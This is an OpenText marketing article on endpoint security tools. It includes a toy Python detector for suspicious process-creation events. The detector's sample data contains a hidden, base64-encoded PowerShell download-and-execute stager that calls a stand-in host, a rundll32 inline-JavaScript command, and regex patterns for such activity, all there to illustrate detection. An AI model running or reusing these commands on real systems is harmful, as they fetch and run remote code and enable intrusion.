The thought that a chain is only as strong as its weakest link is something that can keep IT security professionals awake at night. Today, many large organizations are managing more than 50,000 individual endpoints, with some responsible for in excess of 500,000. That’s a whole lot of entry points – a fact that hackers have not been slow to grasp. Securing and protecting your endpoints is now perhaps the most important element of information security. So what should you look for from your endpoint security tools?
What is endpoint security?
To understand endpoint security, we need to define an endpoint. An endpoint can be thought of as any device that connects to your corporate network and can therefore serve as an entry point into it. This includes end-user devices such as desktops and laptops, but also printers, routers, servers, mobile devices and Internet of Things (IoT) devices, including wearables. Traditional perimeter-focused network security is not sufficient to protect these access points, so a new generation of endpoint security solutions has emerged.
Cyber criminals have been quick to seize on the weakness of poorly protected endpoints, which has driven the need for more advanced endpoint security solutions. Today, these systems are designed to detect, analyze and block attacks in progress, and to identify, contain and remediate breaches quickly when they do occur.
To achieve this, the various endpoint security systems need to work with each other and with other security products to give your organization full visibility and control over its endpoint risks and threats.
Why you need endpoint security
It's often said that endpoint security has grown out of antivirus and anti-malware software. While true, this is a little simplistic. The growing number of poorly protected endpoints, together with increasingly sophisticated attacks, has meant developing an information security approach built on layers of defense that, in aggregate, does far more than block known viruses or prevent known-bad applications from executing on your network.
The rapid development of artificial intelligence and machine learning, coupled with the vast amount of telemetry generated by these endpoints, has enabled a new generation of endpoint security tools that are better at detecting previously unseen threats and that support proactive measures such as threat hunting.
In 2017, a casino in the United States was hacked. There was nothing unusual about that, except that the criminals gained access to the network through an Internet-connected thermometer in the casino's fish tank. This highlights how difficult it is to know how many endpoints you must consider when setting your endpoint security strategy. At the same time, even the best-known endpoint security threats continue to pose major risks. In June 2021, the world's largest meat processor, JBS, confirmed it had paid attackers $11 million, one of the largest publicly confirmed ransomware payments at the time.
According to a joint OpenText and SANS endpoint security survey, almost a third of respondents said attackers had accessed their endpoints, with 77% admitting they found it difficult to identify what data was breached or simply didn’t know at all.
The need for a comprehensive and integrated endpoint security solution continues to grow driven by several factors, including:
Proliferation of endpoints
The idea that user devices such as desktops or laptops are the only endpoints you need to protect is a distant memory. The OpenText and SANS survey’s list of endpoints includes:
- Mobile devices
- Cloud based systems
- IoT devices
- POS devices
- Smart sensors
- Smart systems
- Building controls
- Environmental controls
- Physical perimeter security systems
Cybersecurity has been described as an 'arms race'. As you get a handle on one form of attack, the criminals have already adapted or developed an entirely new attack vector. Recent developments show how sophisticated attacks have become: fileless malware runs through legitimate programs already present on the system (script interpreters, administrative tools and the like) and leaves little or nothing on disk for file-based scanning to find, while zero-day attacks exploit a vulnerability before it is publicly known or a fix is available.
The COVID-19 pandemic saw a massive acceleration in remote working as many organizations let their employees work safely from home. This required very rapidly introducing the IT infrastructure to allow it to happen, and it meant that there were suddenly far more endpoints that needed secure access to the network. The period even produced a new phrase, 'Zoombombing', for uninvited participants disrupting Zoom meetings whose links or IDs they had obtained or guessed.
As cloud, 5G and IoT technologies mature, organizations are looking to move content, data and processing closer to the applications, things and users that interact with them through edge computing. This has created more intelligent endpoints, but because many IoT devices and sensors have not traditionally been designed with security in mind, the attack surface grows substantially as the number of devices within an organization expands.
Key components of endpoint security
While endpoint security may sound like a single category, it comprises several distinct components. Key elements of endpoint security systems include:
Endpoint Detection and Response
Endpoint Detection and Response (EDR) solutions continuously monitor all endpoints for rapid threat detection and automated response. The best EDR systems analyze the vast amounts of telemetry from endpoints (process creation, command lines, network connections, file and registry changes) using heuristics and behavioral analysis, so that they can detect and respond in real time not only to known threats but to suspicious behavior that has no known signature. In addition, EDR solutions with forensic capabilities retain that telemetry, providing the visibility needed to uncover malicious activity even when it is well hidden. This also allows organizations to quickly identify the source and scope of a breach and to take remedial action.
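The behavioral analysis described above, and the fileless malware pattern mentioned earlier in the article, can be illustrated with a small rule-based detector run over process-creation telemetry. The following is an added example written for this article; it is not OpenText or Webroot code. The event format and field names (ts, host, parent, image, cmdline) are assumptions, the events themselves are constructed for the example, and the rules are deliberately simple versions of checks a real EDR product applies: an Office application spawning a script host, an encoded PowerShell command that decodes to a download-and-execute stager, and rundll32 launching inline JavaScript.

```python
"""Toy behavioural detector over endpoint process-creation events.

Added illustration, not product code. Field names and the sample events
are assumptions constructed for this example.
"""
import base64
import re

# Constructed sample telemetry (not real data). The second event is a
# fileless, "living off the land" pattern: Word spawns PowerShell with a
# hidden window and a base64-encoded download-and-execute stager.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
SAMPLE_EVENTS = [
    {"ts": "2021-06-01T09:00:01", "host": "wks-17", "parent": "explorer.exe",
     "image": "winword.exe", "cmdline": "winword.exe /n invoice.docx"},
    {"ts": "2021-06-01T09:00:07", "host": "wks-17", "parent": "winword.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + base64.b64encode(STAGER.encode("utf-16le")).decode()},
    {"ts": "2021-06-01T09:05:00", "host": "wks-17", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -File Get-Inventory.ps1"},
    {"ts": "2021-06-01T09:06:00", "host": "wks-22", "parent": "services.exe",
     "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"ts": "2021-06-01T09:07:00", "host": "wks-22", "parent": "cmd.exe",
     "image": "rundll32.exe",
     "cmdline": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication"'},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                          re.IGNORECASE)
DOWNLOAD_EXEC = re.compile(r"\b(IEX|Invoke-Expression|DownloadString|DownloadFile)\b",
                           re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable.

    PowerShell expects the argument to be base64 of UTF-16LE text, so a
    value that does not decode that way is treated as 'no encoded command'.
    """
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return a list of (rule, detail) findings for a single event."""
    findings = []
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmdline = event["cmdline"]

    # Behavioural rule: documents should not spawn script interpreters.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(("office_spawns_script_host", f"{parent} -> {image}"))

    # Content rule: decode the command the attacker tried to obscure.
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append(("encoded_powershell", decoded))
        if DOWNLOAD_EXEC.search(decoded):
            findings.append(("download_and_execute", decoded))

    # LOLBin rule: rundll32 running inline script instead of a DLL export.
    if image == "rundll32.exe" and "javascript:" in cmdline.lower():
        findings.append(("rundll32_inline_script", cmdline))
    return findings


def run(events):
    """Evaluate every event and return one detection record per finding."""
    detections = []
    for event in events:
        for rule, detail in evaluate(event):
            detections.append({"ts": event["ts"], "host": event["host"],
                               "image": event["image"], "rule": rule,
                               "detail": detail})
    return detections


def rules_by_host(detections):
    """Collapse detections into {host: sorted list of rule names} for triage."""
    summary = {}
    for d in detections:
        summary.setdefault(d["host"], set()).add(d["rule"])
    return {host: sorted(rules) for host, rules in summary.items()}


if __name__ == "__main__":
    for d in run(SAMPLE_EVENTS):
        print(f'{d["ts"]} {d["host"]} {d["image"]}: {d["rule"]} ({d["detail"][:60]})')
```

Note what the detector does not flag: the administrator's PowerShell run from Explorer with a script file, and a normal service host. The point of behavioral rules is the parent-child relationship and the decoded intent, not the presence of powershell.exe on its own, which is exactly why file-based scanning alone misses fileless activity.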
Threat Intelligence
Cyber-threat intelligence is information about threats and threat actors that helps mitigate harmful events in cyberspace. Threat intelligence solutions combine information from a wide range of sources, such as open-source databases and social media, so that other endpoint security tools can learn about and monitor for known threats, helping to combat malware and phishing attacks among others. For example, Webroot BrightCloud is a global knowledge base of over 43 billion URLs and over 37 billion detailed file behavior records that allows organizations to quickly classify files as malicious or trustworthy and to check URLs before users reach them.
Data Protection & Back up
With the growth of ransomware, the importance of an effective backup and disaster recovery strategy has never been greater. Organizations can't afford the operational or reputational damage of having their data held to ransom. Data protection and backup solutions allow data to be recovered in minutes, with a recovery point very close to the last known-good state. In this way, your business can resume operations quickly while the affected data is remediated or removed. Because modern ransomware deliberately seeks out and encrypts or deletes reachable backups before detonating, at least one copy should be kept offline or immutable and restores should be tested regularly.
Key capabilities of endpoint security
The key capabilities for enterprise endpoint security solutions include:
- Detection of security threats including malware that uses file-based and fileless exploits
- Allow- and block-listing of software, scripts and processes
- Real-time threat detection with behavioral analysis of device activity, application and user data
- Automated response to identified threats to remove or contain them, and notify security personnel
- Rolling back endpoints and data to a previous state in the event of a ransomware attack or system corruption
- Endpoint isolation and sandboxing for suspect endpoints and processes
- Forensic response capabilities assisting scope and root-cause analysis
- Methods to detect insider activity and system mis-use
Best practices for endpoint security
Traditionally, organizations have deployed a range of endpoint security tools that together form a patchwork of isolated point solutions with silos of data. Worse still, this situation multiplies false positives, which makes the work of the IT security team that much more complicated and increases the chance that actual intrusions are missed.
Endpoint Protection Platforms (EPP), which focus on preventing known threats from executing, often lack the detection and response capabilities needed once an attacker is already inside. The best practice for endpoint security is to combine as many of its constituent components as possible. Integrating your EPP with an EDR solution is the minimum; effective layers of defense are created when all components work together and with other network security solutions.
In addition, the proliferation of endpoint devices has changed the game for endpoint security. As the fish tank example demonstrates, endpoint security moves the responsibility of IT security teams into traditionally non-IT spaces. IoT is increasingly linking the digital and physical worlds and a broader information management perspective is required to ensure that the content and data now held on each endpoint is properly managed and secure.
How to select the best endpoint security solutions
The type of endpoint security you need depends on your specific business requirements but here are a few tips to help you select the endpoint security tools for you:
Continuous endpoint monitoring
Time (and ransomware) has proven that sooner or later, every organization will likely be compromised. The endpoint security solution you choose must be able to continuously monitor all your endpoints to quickly spot malicious or unusual behavior and it must be able to analyze endpoint data in near real time to understand the scope of any attack from start to finish. The best endpoint security systems also give visibility into where malware came from, where it’s been and what it’s doing – as well as help determine the best way to end the attack and remediate the damage.
Rapid detection and response
The best Endpoint Detection and Response solutions can reduce breach identification and remediation times from many months (or years!) to a matter of minutes. By integrating with threat intelligence, the endpoint security tool uses the most up-to-date attacker tactics, techniques and procedures (TTPs) and behavioral indicators to prioritize threat alerts and reduce false positives. This allows you to respond quickly and effectively, apply digital forensics to accelerate investigations, and reduce management complexity by searching across all endpoints for indicators of compromise or malware artifacts.
Using a single source for endpoint security solutions
Endpoint security can often become a mix of siloed point products. In fact, no one solution will provide the level of security and protection you need. Many organizations are finding it beneficial to find an endpoint security software supplier with a comprehensive portfolio of complementary solutions with native integration to one another. For example, OpenText provides targeted solutions covering Endpoint Detection and Response, Threat Intelligence and Data Protection and Back up.
Take advantage of managed detection and response services
Advances in cloud-based endpoint security solutions mean that more providers are offering endpoint security as a managed service. The best endpoint security services are tailored to your business needs and allow you to benefit from the right level of security skills and resources, delivered on a flexible and scalable basis. The larger endpoint security providers can deliver global coverage, taking into account the security and data regulations in the markets and geographies where you operate. OpenText MDR combines best-of-breed technologies with security personnel to support customers globally, continuously gathering insight into the most recent tactics, techniques and procedures (TTPs) used by threat actors.
Learn more about OpenText Enterprise Security solutions.
Author: Alexis Robbins, Senior Product Marketing Manager